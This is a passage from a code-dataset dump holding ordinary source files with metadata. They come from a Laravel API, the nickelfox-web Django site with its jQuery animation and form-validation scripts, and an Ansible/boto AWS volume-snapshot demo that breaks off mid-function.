"alpha_fraction": 0.5950196385383606,
"alphanum_fraction": 0.5963302850723267,
"avg_line_length": 20.799999237060547,
"blob_id": "9aaad57eb554aca4c235844cd1043266bf0f77ee",
"content_id": "be475034860f721638285bed53b783ffa39ef13d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 763,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 35,
"path": "/app/Http/Middleware/LogResponses.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Middleware;\n\nuse Closure;\nuse Illuminate\\Http\\Request;\n\nclass LogResponses\n{\n /**\n * Handle an incoming request.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\Closure $next\n * @return mixed\n */\n public function handle(Request $request, Closure $next)\n {\n return $next($request);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param \\Illuminate\\Http\\Response|\\Illuminate\\Http\\JsonResponse $response\n */\n public function terminate(Request $request, $response)\n {\n logger()->debug('Response logged', [\n 'headers' => $response->headers->all(),\n 'content' => $response->content(),\n ]);\n }\n}\n"
},
{
"alpha_fraction": 0.530932605266571,
"alphanum_fraction": 0.5429362654685974,
"avg_line_length": 27.5,
"blob_id": "956b1909f933b8ff135ea906ff10e5f019b9ef71",
"content_id": "2533cb1c823564305e754ed5961fdd670c5a0036",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1083,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 38,
"path": "/app/Docs/Schemas/Admin/StoreAdminSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\Admin;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass StoreAdminSchema extends Schema\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->type(static::TYPE_OBJECT)\n ->required(\n 'name',\n 'phone',\n 'email',\n 'password'\n )\n ->properties(\n Schema::string('name')\n ->maxLength(255),\n Schema::string('phone')\n ->maxLength(255),\n Schema::string('email')\n ->maxLength(255),\n Schema::string('password')\n ->maxLength(255)\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6026616096496582,
"alphanum_fraction": 0.6045627593994141,
"avg_line_length": 20.91666603088379,
"blob_id": "f0dcdc473a2bfe1e6f396c5992d51b3f323ce827",
"content_id": "5d7628877c7475e5c57e39c6f4fa85f0303d9c1b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 526,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 24,
"path": "/database/factories/FileFactory.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse App\\Models\\File;\nuse Faker\\Generator as Faker;\nuse Illuminate\\Support\\Str;\n\n/** @var \\Illuminate\\Database\\Eloquent\\Factory $factory */\n$factory->define(File::class, function (Faker $faker): array {\n return [\n 'filename' => Str::random() . '.txt',\n 'mime_type' => File::MIME_TYPE_TXT,\n 'is_private' => false,\n ];\n});\n\n$factory->state(File::class, 'public', [\n 'is_private' => false,\n]);\n\n$factory->state(File::class, 'private', [\n 'is_private' => true,\n]);\n"
}
] | 285 |
singhsugga/nickelfox-web
|
https://github.com/singhsugga/nickelfox-web
|
d670f6edd3f18a62feded723235c41e88f1b9e2e
|
305139675d95780c93855f86c3da39bad22d115e
|
cf8250da740138ea001df87aedc4221def575db3
|
refs/heads/master
| 2021-09-28T06:28:11.225979 | 2018-11-15T06:40:17 | 2018-11-15T06:40:17 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 15.666666984558105,
"blob_id": "54548e045ca2b8f0a397ac34912089a3493e50ee",
"content_id": "d8af96626aaf6d28ffd28c7798d221b27cfdff61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 150,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 9,
"path": "/requirements.txt",
"repo_name": "singhsugga/nickelfox-web",
"src_encoding": "UTF-8",
"text": "Django==2.1.3\ndjango-appconf==1.0.2\ndjango-compressor==2.2\ndjango-libsass==0.7\nlibsass==0.15.1\npytz==2018.7\nrcssmin==1.0.6\nrjsmin==1.0.12\nsix==1.11.0\n"
},
{
"alpha_fraction": 0.625246524810791,
"alphanum_fraction": 0.635108470916748,
"avg_line_length": 35.25,
"blob_id": "5553dd221d7bcf340b7e062e64c21bc822be3fb5",
"content_id": "3b126f8738c12f6b44d4986368e27d5b6e067886",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1014,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 28,
"path": "/web/static/web/js/scroll-reveal.js",
"repo_name": "singhsugga/nickelfox-web",
"src_encoding": "UTF-8",
"text": "$(function () {\n // Initialization\n var controller = new ScrollMagic.Controller();\n\n var cs_study_carousel = new ScrollMagic.Scene({\n triggerElement: '#cs_study_target',\n triggerHook: 0.9,\n reverse: false\n }).setClassToggle('#cs_study_target #cs-study-carousel', 'slide-up').addTo(controller);\n\n var what_we_do_section = new ScrollMagic.Scene({\n triggerElement: '#what-we-do',\n triggerHook: 0.7,\n reverse: false\n }).setClassToggle('#what-we-do .text-wave-on-enter', 'text-wave-active').addTo(controller);\n\n var trusted_by_section = new ScrollMagic.Scene({\n triggerElement: '#companies',\n triggerHook: 0.65,\n reverse: false\n }).setClassToggle('#companies .companies__tile__img__wpr', 'reveal').addTo(controller);\n\n var press_section = new ScrollMagic.Scene({\n triggerElement: '#press',\n triggerHook: 0.55,\n reverse: false\n }).setClassToggle('#press .press-list ul li', 'reveal').addTo(controller);\n});"
},
{
"alpha_fraction": 0.8181818127632141,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 22,
"blob_id": "4db91d66210451de1fcb3822843409bc122147b4",
"content_id": "3ba3191c2961b689b2e3468221091fe363c61006",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 22,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 1,
"path": "/README.md",
"repo_name": "singhsugga/nickelfox-web",
"src_encoding": "UTF-8",
"text": "# nickelfox-web-python"
},
{
"alpha_fraction": 0.531068742275238,
"alphanum_fraction": 0.5476387739181519,
"avg_line_length": 22.60784339904785,
"blob_id": "9e55f027b0e12859f6c094faffc9013ed4dcf707",
"content_id": "0f5d5c7c471efb8791ac8247d807055863f5f29e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1207,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 51,
"path": "/web/static/web/js/home.js",
"repo_name": "singhsugga/nickelfox-web",
"src_encoding": "UTF-8",
"text": "var container = null;\nvar items = null;\nvar currentPos = 0;\nvar interval = null;\n\n$(document).ready(function () {\n $('.companies-list ul').slick({\n dots: false,\n autoplay: false,\n centerMode: true,\n infinite: true,\n variableWidth: true,\n slidesToShow: 1,\n speed: 300,\n });\n\n $('.testimonial_slider').slick({\n dots: true,\n infinite: true,\n autoplay: true,\n autoplaySpeed: 5000,\n speed:200,\n prevArrow: $('#testimonial-controls .slick-pre'),\n nextArrow: $('#testimonial-controls .slick-nex'),\n fade: true,\n cssEase: 'linear'\n });\n\n $('.cs_study_slick_slider').slick({\n dots: true,\n infinite: true,\n autoplay: true,\n autoplaySpeed: 10000,\n prevArrow: $('#cs-study-carousel .slick-pre'),\n nextArrow: $('#cs-study-carousel .slick-nex'),\n appendDots: $('.case_study_indicators'),\n speed: 300,\n fade: true,\n cssEase: 'linear'\n });\n\n \n});\n\n\nfunction testimonial_prev() {\n $('#testimonials .carousel').carousel('prev')\n}\nfunction testimonial_next() {\n $('#testimonials .carousel').carousel('next');\n}\n\n\n\n"
},
{
"alpha_fraction": 0.531086802482605,
"alphanum_fraction": 0.5371524691581726,
"avg_line_length": 36.099998474121094,
"blob_id": "09c4efe62c09877318fb1ab82e9194f21b79496e",
"content_id": "315afe4ebe0ad8d2d5e7896d8ed9093b7506a100",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 5935,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 160,
"path": "/web/static/web/js/main.js",
"repo_name": "singhsugga/nickelfox-web",
"src_encoding": "UTF-8",
"text": "var body = $('body');\nvar menu = $('.main-menu');\nvar main_menu_list = $('li.text-wave-on-click');\nvar expertiseHoverTimeout = null;\nvar scrollBarWidth;\nvar close_hamburger = $('#hmbrgr-icon-x');\nvar hamburger = $('#hmbrgr-icon-black');\n// $(window).on('load', function () {\n// $(window).scrollTop(0);\n// });\n\n$(window).on('resize', function () {\n getScrollBarWidth();\n});\n\n$(document).ready(function () {\n getScrollBarWidth();\n\n // FOR PREVENTING RELOAD ON SAME PAGE OF LINK IS CLICKED\n $(\"a\").each(function () {\n if (window.location.href == this.href) {\n var scope = $(this).attr('data-scope')\n this.onclick = function () {\n if (scope == 'main-menu') {\n toggle_menu();\n } else {\n $(\"html, body\").animate({ scrollTop: 0 }, 300, 'swing');\n }\n return false\n };\n }\n });\n \n $('[data-toggle=\"tooltip\"]').tooltip({\n trigger : 'hover'\n }).on('click',function () {\n $(this).tooltip('hide');\n });\n\n $('#main-menu').on('click', function (e) {\n if ($(this).is(e.target)) {\n toggle_menu();\n }\n });\n\n $('.text-wave-on-load').addClass('text-wave-active');\n //========== case study ===========//\n var cs_anim_triggers = $('.cs-anim-trg-1,.cs-anim-trg-2')\n var shrinking_divs = cs_anim_triggers.children().not('.no-animation');\n var growing_divs = shrinking_divs.children().not('.no-animation');\n cs_anim_triggers.hover(\n function () {\n growing_divs.addClass('cs_grow_anim')\n shrinking_divs.addClass('cs_srink_anim')\n },\n function () {\n growing_divs.removeClass('cs_grow_anim')\n shrinking_divs.removeClass('cs_srink_anim')\n }\n )\n\n //========== expertise section ===========//\n var timer_1, timer_2;\n $('.content').mouseenter(function () {\n var slide = $(this).attr('data-slide');\n $('.bg').removeClass('show').addClass('hide');\n $('.bg-' + slide).addClass('show');\n $('.bg-video').removeClass('show');\n $('.bg-video-' + slide).addClass('show');\n $('.content').removeClass('show').addClass('hide');\n $(this).addClass('show');\n $(this).find('.services__tile_list_content_wpr').addClass('slide-up');\n $(this).find('.arrow__btn').addClass('expertise__btn__hover')\n $(this).find('.slide__up__content__wpr').addClass('slide-up')\n\n }).mouseleave(function () {\n\n $('.bg').removeClass('show').removeClass('hide');\n $('.bg-video').removeClass('show');\n $('.content').removeClass('show').removeClass('hide');\n $(this).find('.services__tile_list_content_wpr').removeClass('slide-up');\n $(this).find('.expertise__btn__hover').removeClass('expertise__btn__hover');\n $(this).find('.slide__up__content__wpr').removeClass('slide-up');\n });\n\n $('#expertise').mouseenter(function () {\n var elem = $(this);\n expertiseHoverTimeout = setTimeout(function () {\n elem.addClass('active');\n }, 300);\n }).mouseleave(function () {\n var elem = $(this);\n elem.removeClass('active');\n clearTimeout(expertiseHoverTimeout);\n });\n\n\n $(document).on('click', '#apply-btn', function (e) {\n var modal_type = '';\n var modal_markup = '';\n if (this.id == 'apply-btn') {\n //for careers page\n modal_type = 'apply';\n var modal_markup = `<div id=\"apply-modal-wpr\" class=\"d-flex pop-up-modal px-3 align-items-center justify-content-center\">\n <div id=\"apply-modal\" class=\"d-flex flex-column px-3 align-items-center text-center justify-content-center \">\n <span class=\"text-white\" id=\"modal-dismiss\"></span>\n <div class=\"py-5\">\n <p class=\" fs-14 fw-300 fs-xl-18 m-0\">Send your resume to: <a class=\"text-white\" href=\"mailto:[email protected]\"><b>[email protected]<b></a></p>\n 
<button id=\"dismiss-apply-modal\" class=\"btn__normal btn__normal--light py-4 cursor w-50 fs-12 px-5 mt-5\">ok</button></div>\n </div>\n </div>`;\n }\n e.preventDefault();\n $(body).addClass('scroll-disabled');\n $(body).append(modal_markup);\n setTimeout(function () {\n $('#' + modal_type + '-modal-wpr').addClass('active');\n $('#' + modal_type + '-modal').addClass('active');\n }, 50);\n\n $('#' + modal_type + '-modal-wpr').on('click', function (e) {\n if ($(this).is(e.target) || e.target.id === 'dismiss-' + modal_type + '-modal') {\n $(body).removeClass('scroll-disabled');\n $(this).removeClass('active');\n $('#' + modal_type + '-modal').removeClass('active');\n setTimeout(function () {\n $(this).remove();\n }.bind(this), 350)\n }\n });\n\n });\n});\n\n\n//========== main menu section ===========//\nfunction toggle_menu() {\n menu.toggleClass('main-menu-active'); //toggle main menu\n close_hamburger.toggleClass('active');\n hamburger.toggleClass('inactive');\n if (window.is_dark_nav_active) {\n $('#hmbrgr-icon-white').toggleClass('show');\n $('#nfx-logo-white').toggleClass('show');\n $('#hmbrgr-icon-black').toggleClass('hide');\n $('#nfx-logo-black').toggleClass('hide');\n }\n // scroll bar hide hack to deal with sudden jerks \n $('body').toggleClass('scroll-disabled');\n if ($('#body').hasClass('scroll-disabled')) {\n $('#body,#navbar,#menu-wpr').css('margin-right', scrollBarWidth);\n } else {\n $('#body,#navbar,#menu-wpr').css('margin-right', 0);\n }\n\n main_menu_list.toggleClass('text-wave-active');// toggle main menu links animation\n}\n\nfunction getScrollBarWidth() {\n scrollBarWidth = window.innerWidth - document.documentElement.clientWidth;// scrollbar width on all devices\n}"
},
{
"alpha_fraction": 0.5093351006507874,
"alphanum_fraction": 0.5119554400444031,
"avg_line_length": 29.520000457763672,
"blob_id": "0489e8ad509be2b0852e2836c79a177995b770b6",
"content_id": "9f57ced350a8535377ff81edfd91b908ea57fe26",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3053,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 100,
"path": "/web/static/web/js/navbar-state.js",
"repo_name": "singhsugga/nickelfox-web",
"src_encoding": "UTF-8",
"text": "$(function () {\n var has_scrolled = false;\n var $dark_sections = null;\n var ranges = [];\n var $nfx_logo_white = $('#nfx-logo-white');\n var $nfx_logo_black = $('#nfx-logo-black');\n var $hmbrgr_icon_white = $('#hmbrgr-icon-white');\n var $hmbrgr_icon_black = $('#hmbrgr-icon-black');\n var is_dark_nav_active = false;\n var $scrollTop;\n window.is_dark_nav_active = false;\n // initialize\n init_();\n first_time_load_exec();\n $(window).on('resize', function () {\n init_();\n });\n\n $(window).scroll(function (e) {\n has_scrolled = true;\n $scrollTop = $(this).scrollTop();\n });\n\n setInterval(check_range, 100);\n function check_range() {\n if (has_scrolled) {\n has_scrolled = false;\n var on_black_section = false;\n for (let i = 0; i < ranges.length; i++) {\n if ($scrollTop + 50 >= ranges[i].top && $scrollTop + 50 <= ranges[i].bottom) {\n on_black_section = true;\n break;\n }\n }\n\n if (on_black_section && !is_dark_nav_active) {\n is_dark_nav_active = true;\n window.is_dark_nav_active = true;\n activate_dark_nav();\n } else if (!on_black_section && is_dark_nav_active) {\n is_dark_nav_active = false;\n window.is_dark_nav_active = false;\n deactivate_dark_nav();\n }\n\n }\n }\n\n\n function init_() {\n if ($('#expertise-mobile').css('display') == 'none') {\n $('#expertise-mobile').removeClass('dark_section');\n } else {\n $('#expertise-mobile').addClass('dark_section');\n }\n\n if ($('#expertise').css('display') == 'none') {\n $('#expertise').removeClass('dark_section');\n } else {\n $('#expertise').addClass('dark_section')\n }\n ranges = [];\n $dark_sections = null;\n $dark_sections = get_dark_sections();\n set_ranges_object_array();\n }\n\n function get_dark_sections() {\n return $('.dark_section');\n }\n\n function set_ranges_object_array() {\n $dark_sections.each(function () {\n var $element = $(this);\n var element_top = $element.position().top;\n var element_bottom = element_top + $element.height();\n ranges.push({ top: Math.round(element_top), bottom: Math.round(element_bottom) })\n });\n }\n\n function first_time_load_exec() {\n has_scrolled = true;\n $scrollTop = $(window).scrollTop();\n }\n\n function activate_dark_nav() {\n $hmbrgr_icon_white.addClass('show');\n $nfx_logo_white.addClass('show');\n $nfx_logo_black.addClass('hide');\n $hmbrgr_icon_black.addClass('hide');\n }\n\n function deactivate_dark_nav() {\n $hmbrgr_icon_white.removeClass('show');\n $nfx_logo_white.removeClass('show');\n $nfx_logo_black.removeClass('hide');\n $hmbrgr_icon_black.removeClass('hide');\n }\n\n})\n\n"
},
{
"alpha_fraction": 0.3953010141849518,
"alphanum_fraction": 0.41483113169670105,
"avg_line_length": 49.07352828979492,
"blob_id": "cf65fd4c356cccebfa0f761c16b473b223cd11eb",
"content_id": "8000673c74ea7809bc0b1a0c01d2a79efb4a3f42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 6810,
"license_type": "no_license",
"max_line_length": 185,
"num_lines": 136,
"path": "/web/static/web/js/validate.js",
"repo_name": "singhsugga/nickelfox-web",
"src_encoding": "UTF-8",
"text": "window.validate = function ($form) {\n $form.find('.input-wrapper').removeClass('error');\n $form.find('span.error').remove();\n\n var $isValid = true;\n var name_re = /^[a-zA-Z ]+$/;\n var email_re = /^(([^<>()\\[\\]\\\\.,;:\\s@\"]+(\\.[^<>()\\[\\]\\\\.,;:\\s@\"]+)*)|(\".+\"))@((\\[[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\])|(([a-zA-Z\\-0-9]+\\.)+[a-zA-Z]{2,}))$/;\n var Url_re = /^(http:\\/\\/|https:\\/\\/)?(www.)?([a-zA-Z0-9]+).[a-zA-Z0-9]*.[a-z]{3}.?([a-z]+)?$/;\n var fb_re = /(?:(?:http|https):\\/\\/)?(?:www.)?facebook.com\\/(?:(?:\\w)*#!\\/)?(?:pages\\/)?(?:[?\\w\\-]*\\/)?(?:profile.php\\?id=(?=\\d.*))?([\\w\\-]*)?/;\n var mbl_re = /^(\\+|00){0,2}(9[976]\\d|8[987530]\\d|6[987]\\d|5[90]\\d|42\\d|3[875]\\d|2[98654321]\\d|9[8543210]|8[6421]|6[6543210]|5[87654321]|4[987654310]|3[9643210]|2[70]|7|1)\\d{1,14}$/;\n var link_re = /(ftp|http|https):\\/\\/?(?:www\\.)?linkedin.com(\\w+:{0,1}\\w*@)?(\\S+)(:([0-9])+)?(\\/|\\/([\\w#!:.?+=&%@!\\-\\/]))?/;\n var twitter_re = /http(?:s)?:\\/\\/(?:www\\.)?twitter\\.com\\/([a-zA-Z0-9_]+)/;\n $form.find('span.form-error').remove();\n $form.find('.required').each(function () {\n var $this = $(this);\n var $fieldName = $this.attr('data-field-name');\n var $fieldType = $this.attr('data-field-type');\n var $value = $this.val();\n var $textLength = null;\n if (Array.isArray($value) && $fieldType == 'multiselect') {\n $textLength = $value.length; // for multiselect ($value will be an array)\n } else {\n $textLength = $value.replace(/\\s/g, '').length;\n }\n switch ($fieldType) {\n case 'select':\n if ($textLength <= 0) {\n $this.parent().append('<span class=\"error\">' + $fieldName + ' required!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n }\n break;\n case 'multiselect':\n if ($textLength <= 0) {\n $this.parent().append('<span class=\"error\">' + $fieldName + ' required!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n }\n break;\n case 'text':\n if ($textLength <= 0) {\n $this.parent().append('<span class=\"error\">' + $fieldName + ' required!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n } else if (name_re.test($value) == false) {\n $this.parent().append('<span class=\"error\">Invalid ' + $fieldName + '!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n }\n break;\n case 'url':\n if ($textLength <= 0) {\n $this.parent().append('<span class=\"error\">' + $fieldName + ' required!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n } else if (Url_re.test($value) == false) {\n $this.parent().append('<span class=\"error\">Invalid ' + $fieldName + '!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n }\n break;\n case 'fb_url':\n if ($textLength <= 0) {\n $this.parent().append('<span class=\"error\">' + $fieldName + ' required!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n } else if (fb_re.test($value) == false) {\n $this.parent().append('<span class=\"error\">Invalid ' + $fieldName + '!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n }\n break;\n case 'text_not_req':\n if (isNaN($value) == true) {\n $this.parent().append('<span class=\"error\">Invalid ' + $fieldName + '!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n }\n break;\n case 'email':\n if ($textLength <= 0) {\n $this.parent().append('<span class=\"error\">' + $fieldName + ' required!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n } else if (email_re.test($value.toLowerCase()) == false) 
{\n console.log($value.toLowerCase());\n $this.parent().append('<span class=\"error\">Invalid ' + $fieldName + '!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n }\n break;\n case 'mobile_number':\n if ($textLength <= 0) {\n $this.parent().append('<span class=\"error\">' + $fieldName + ' required!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n } else if (mbl_re.test($value) == false) {\n $this.parent().append('<span class=\"error\">Invalid ' + $fieldName + '!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n }\n break;\n case 'link':\n if ($textLength <= 0) {\n $this.parent().append('<span class=\"error\">' + $fieldName + ' required!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n } else if (link_re.test($value) == false) {\n $this.parent().append('<span class=\"error\">Invalid ' + $fieldName + '!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n }\n break;\n case 'twitter':\n if ($textLength <= 0) {\n $this.parent().append('<span class=\"error\">' + $fieldName + ' required!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n } else if (twitter_re.test($value) == false) {\n $this.parent().append('<span class=\"error\">Invalid ' + $fieldName + '!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n }\n break;\n case 'select':\n if ($value == '*' || $textLength <= 0) {\n $this.parent().append('<span class=\"error\">Select ' + $fieldName + '!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n }\n break;\n }\n });\n\n return $isValid;\n}\n"
},
{
"alpha_fraction": 0.7137546539306641,
"alphanum_fraction": 0.7137546539306641,
"avg_line_length": 19.69230842590332,
"blob_id": "ff2d7bfbf44bac77b48afd884226dc1b25e2c46a",
"content_id": "3e1a8a34798ee076353c19a3166869d6d595ea3b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 269,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 13,
"path": "/web/views.py",
"repo_name": "singhsugga/nickelfox-web",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\n\n\n\ndef index(request):\n return render(request,'web/pages/index.html',{})\n\ndef careers(request):\n return render(request,'web/pages/careers.html',{})\n\ndef contact(request):\n return render(request,'web/pages/contact.html',{})\n"
}
] | 8 |
gauravrishi168/ansible
|
https://github.com/gauravrishi168/ansible
|
8d0b4ee411d16cb9c74506dcf9dcb030e4582f05
|
95d9d8a302c2d613cf8de46cdc8ea94e1afb45a6
|
4a8ec4e8bbe0d7fb8ba17e6b0732ae3e784dbeda
|
refs/heads/master
| 2021-01-19T16:25:57.383877 | 2017-12-09T06:27:50 | 2017-12-09T06:27:50 | 88,264,359 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4492063522338867,
"alphanum_fraction": 0.4714285731315613,
"avg_line_length": 18.090909957885742,
"blob_id": "372069284ff1f4419c54d822acbb895ac51ef673",
"content_id": "80c8b0101294b7a9d253807d6ae46ca8e46a06d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 630,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 33,
"path": "/aws-volume-snapshot/README.md",
"repo_name": "gauravrishi168/ansible",
"src_encoding": "UTF-8",
"text": "# awsbackup.yml\n\nThis is an awsbackup.yml playbook. \nExample run:\n\n```\nansible-playbook -i inventory/localhost awsbackup.yml -e \"INCREMENTAL=daily COUNT=3\"\n```\n\n# AWS policy\n\nThe following is the AWS policy used to run this playbook.\n\n```\n{\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Action\": [\n \"ec2:CreateSnapshot\",\n \"ec2:CreateTags\",\n \"ec2:DeleteSnapshot\",\n \"ec2:CreateVolume\",\n \"ec2:Describe*\"\n ],\n \"Resource\": [\n \"*\"\n ]\n }\n ]\n}\n```\n"
},
{
"alpha_fraction": 0.6232114434242249,
"alphanum_fraction": 0.683624804019928,
"avg_line_length": 32.105262756347656,
"blob_id": "8c930abf5b58409addcf549effc04a2c43ad954b",
"content_id": "914a2e6e6dd78ddf343203c5d86dc7c33b3ba498",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Ruby",
"length_bytes": 629,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 19,
"path": "/ansible-demo/misc/Vagrantfile",
"repo_name": "gauravrishi168/ansible",
"src_encoding": "UTF-8",
"text": "Vagrant.configure(2) do |config|\n config.vm.define \"webserver\" do |webserver|\n webserver.vm.box = \"hashicorp/precise32\"\n webserver.vm.network \"private_network\", ip: \"192.168.0.2\"\n webserver.vm.hostname = \"webserver\"\n end\n config.vm.define \"ansible\" do |ansible|\n ansible.vm.box = \"hashicorp/precise32\"\n ansible.vm.network \"private_network\", ip: \"192.168.0.254\"\n ansible.vm.hostname = \"ansible\"\n end\n\nconfig.vm.define \"rishi\" do |rishi|\n rishi.vm.box = \"ubuntu/trusty32\"\n rishi.vm.network \"private_network\", ip: \"192.168.0.26\"\n rishi.vm.hostname = \"rishi\"\n rishi.vm.boot_timeout = 1000\n end\nend\n"
},
{
"alpha_fraction": 0.6407819390296936,
"alphanum_fraction": 0.6423959732055664,
"avg_line_length": 42.90550994873047,
"blob_id": "b586f4b22fc72ad167e3fef4e60cfe87379a272b",
"content_id": "63362bac2daa0e42857a4ac55f270ebef195a972",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5576,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 127,
"path": "/aws-volume-snapshot/awsbackup.py",
"repo_name": "gauravrishi168/ansible",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport boto.ec2\nimport logging\nimport imp\nimport os\nimport sys\nfrom configparser import ConfigParser\nfrom datetime import datetime, timedelta\nfrom optparse import OptionParser\n\nclass AwsBackups():\n def __init__(self, options, args, profile):\n self.snapdate = datetime.now().strftime(\"%Y-%m-%d\")\n self.readable_date = datetime.now().strftime(\"%m-%d-%Y %H:%M:%S\")\n logging.basicConfig(level=logging.INFO)\n self.logger = logging.getLogger()\n\n self.options = options\n self.options.max = int(self.options.max)\n self.args = args\n self.volumes_to_snap = []\n self.instances_to_snap = {}\n self.log_names_to_snap = {}\n self.log_snapshots_to_delete = []\n self.log_snapshots_created = {}\n region = \"us-east-1\"\n self.conn = boto.ec2.connect_to_region(region, aws_access_key_id=profile.get(options.profile, 'aws_access_key_id'), \\\n aws_secret_access_key=profile.get(options.profile, 'aws_secret_access_key'))\n\n def getInstancesFull(self):\n self.reservations = self.conn.get_all_instances(filters={\"tag-key\":self.options.key, \"tag-value\":self.options.tag})\n self.instances = [i for r in self.reservations for i in r.instances]\n for i in self.instances:\n self.volumes_to_snap.extend(v.id for v in self.conn.get_all_volumes() if v.attach_data.instance_id == i.id)\n self.instances_to_snap.update({i:self.volumes_to_snap})\n self.log_names_to_snap.update({i.tags['Name']:self.volumes_to_snap})\n self.volumes_to_snap = []\n\n def takeSnapshotsFull(self):\n for i in self.instances_to_snap:\n self.volumes_to_snap.extend(v.id for v in self.conn.get_all_volumes() if v.attach_data.instance_id == i.id)\n for v in self.instances_to_snap[i]:\n snapshot = self.conn.create_snapshot(v, \"Automated snapshot.\")\n myname = i.tags['Name'] + '_daily_' + self.snapdate\n snapshot.add_tags({'Name': myname, self.options.key: self.options.tag, 'identifier': 'awsbackup'})\n self.log_snapshots_created.update({myname:self.volumes_to_snap})\n self.volumes_to_snap = []\n\n def getSnapshotsFull(self):\n for i in self.instances_to_snap:\n print self.instances_to_snap[i]\n for v in self.conn.get_all_volumes(filters={'attachment.instance-id': i.id}):\n self.deleteSnapshotsFull(v)\n\n def deleteSnapshotsFull(self, v):\n snapshots = self.conn.get_all_snapshots(filters={'volume-id': v.id, \"tag-key\":self.options.key, \"tag-value\":self.options.tag, \\\n \"tag-key\":'identifier', \"tag-value\":'awsbackup'})\n print len(snapshots)\n snap_sorted = sorted([(s.id, s.start_time) for s in snapshots], key=lambda k: k[1])\n print snap_sorted\n for s in snap_sorted[:-self.options.max]:\n self.log_snapshots_to_delete.append(s[0])\n self.conn.delete_snapshot(s[0])\n\n def reportBackup(self):\n # self.logger.info(\"<b>AWS snapshot complete.<br> Instances snapshotted: </b>\" + str(self.log_names_to_snap.keys()) + \"<br>\" + \\\n # \"<b>Snapshots created: </b>\" + str(self.log_snapshots_created.keys()) + \"<br>\" + \\\n # \"<b>Snapshots deleted: </b>\" + str(self.log_snapshots_to_delete))\n self.logger.info(\"AWS snapshot script -----------------> Started: \" + self.readable_date)\n self.logger.info(sys.argv[0] + \" -p \" + self.options.profile + \" -k \" + self.options.key + \" -t \" + self.options.tag)\n self.logger.info(self.readable_date)\n self.logger.info(\"AWS snapshot complete.\")\n self.logger.info(\"Snapshots created:\")\n for each in self.log_names_to_snap.keys():\n self.logger.info(each)\n for 